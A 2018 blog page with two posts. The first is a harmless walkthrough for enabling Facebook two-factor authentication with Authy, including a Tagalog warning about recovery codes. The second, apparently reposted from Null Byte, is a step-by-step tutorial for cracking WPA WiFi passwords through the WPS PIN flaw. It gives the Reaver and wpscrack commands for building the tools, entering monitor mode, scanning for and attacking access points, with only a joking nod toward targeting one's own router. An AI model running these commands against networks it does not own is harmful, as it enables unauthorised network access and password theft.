Saturday, November 17, 2018

How to Secure Your FB Account from Hacking?

No comments
1. Go to facebook Settings.

2. Tap Security and Login then select Use two-factor authentication.
3. Select the Code Generator and tap the third party app link.

 4. After tapping the link, you will be redirected to Set Up a Third Party App to Generate Codes. A QR code will pop-up in the screen which will be use in the next step.

 5. Now launch the Authy (android app) in your smartphone and tap the 3 dots in the upper right corner.

 6. Select Add Account.

7. Select SCAN QR CODE.

 8. Scan the QR code in step #4.

 9. Successfully your FB account now is already safe and secure. Create now your desired account name in the Authy then click DONE.

 10. Now everytime you login in any unrecognized device you will be ask to enter the login code to continue accessing your FB account.

 11. Authy will provide you the login code for you to continue. Note: every codes will expire within 60 seconds. After the 60 seconds grace period the codes provided will not usable anymore.

 DONE!!!

 If someone trying to login using your FB account without your consent, a facebook notification will pop-up in your device.

 You have also the option to review your recent login made in your device.

Keep your account always SAFE..

 WARNING!!!

 Siguraduing hindi mawala ang smartphone mo or huwag itong manakaw or iwasang masira ito dahil kung ito'y mangyayari sa hinaharap kahit ikaw mismo ay hindi na makapag-open sa FB account mo. Dahil ang smartphone mo lang ang tanging SUSI para pwede kang makapalog-in sa ibang device or PC dahil yun lang ang nagbibigay sayo ng LOGIN CODES para ikaw ay makapaglog-in sa ibang device. Maliban na lang kung may ginawa kang Recovery Codes. 

 How to get your Recovery Codes? Refer in the picture below.

After you recieve the Recovey Codes, make sure to keep it in a safe place like by uploading it in a cloud storage if you have, like OneDrive and Google Drive.
Read More

Hack WPA WiFi Passwords by Cracking the WPS PIN

No comments
A flaw in WPS, or WiFi Protected Setup, known about for over a year by TNS, was finally exploited with proof of concept code. Both TNS, the discoverers of the exploit and Stefan at .braindump have created their respective "reaver" and "wpscrack" programs to exploit the WPS vulnerability. From this exploit, the WPA password can be recovered almost instantly in plain-text once the attack on the access point WPS is initiated, which normally takes 2-10 hours (depending on which program you use).


This exploit defeats WPS via an intelligent brute force attack to the static WPS PIN. By guessing the PIN, the router will actually throw back, whether or not the first four digits (of eight) are correct. Then, the final number is a checking number used to satisfy an algorithm. This can be exploited to brute force the WPS PIN, and allow recovery of the WPA password in an incredibly short amount of time, as opposed to the standard attack on WPA.
In this Null Byte, let's go over how to use both tools to crack WPS. As of yet, no router is safe from this attack, and yet none of the vendors have reacted and released firmware with mitigations in place. Even disabling WPS still allows this attack on most routers.



Requirements






Raspberry Pi.Image by SADMIN/Null Byte
  • A computer (or virtual machine) running Kali Linux OS. If you're a beginner, you can start with our Kali Pi build based on the $35 Raspberry Pi. which we go over in detail here:
n>
  • A router at home with WPS
  • A Wireless Network Adapter capable of monitor mode and packet injection. Confused? Check out our 2017 guide here, or you can get started with our most popular long range and short range adapters for beginners.
  • The following programs installed (install by package name): aircrack-ng, python-pycryptopp, python-scapy, libpcap-dev






SADMIN / Null Byte

Tools

  • Reaver (support for all routers)
  • wpscrack (faster, but only support for major router brands)

Crack WPS

Text in bold is a terminal command.
Follow the guide that corresponds to the tool that you chose to use below.

Reaver

  1. Unzip Reaver.
  • unzip reaver-1.3.tar.gz
  1. Change to the Reaver directory.
  • cd reaver-1.3
  1. Configure, compile and install the application.
  • ./configure && make && sudo make install
  1. Scan for an access point to attack, and copy its MAC address for later (XX:XX:XX:XX:XX:XX).
  • sudo iwlist scan wlan0
  1. Set your device into monitor mode.
  • sudo airmon-ng start wlan0
  1. Run the tool against an access point.
  • reaver -i mon0 -b <MA:CA:DD:RE:SS:XX> -vv
  1. Wait until it finishes.
This tool makes it too easy.

wpscrack.py

  1. Make the program an executable.
  • chmod +x wpscrack.py
  1. Scan for an access point to attack, and copy its MAC address for later (XX:XX:XX:XX:XX:XX).
  • sudo iwlist scan wlan0
  1. Get your MAC address, save it for later.
  • ip link show wlan0 | awk '/ether/ {print $2}'
  1. Set your device into monitor mode.
  • sudo airmon-ng start wlan0
  1. Attack your AP.
  • wpscrack.py –iface mon0 –client <your MAC, because you're attacking yourself, right?> –bssid <AP MAC address> --ssid <name of your AP> -v
  1. Await victory.
Now, let's hope we see a lot of firmware update action going on in the near future, or else a lot of places are in a whole world of trouble.
Read More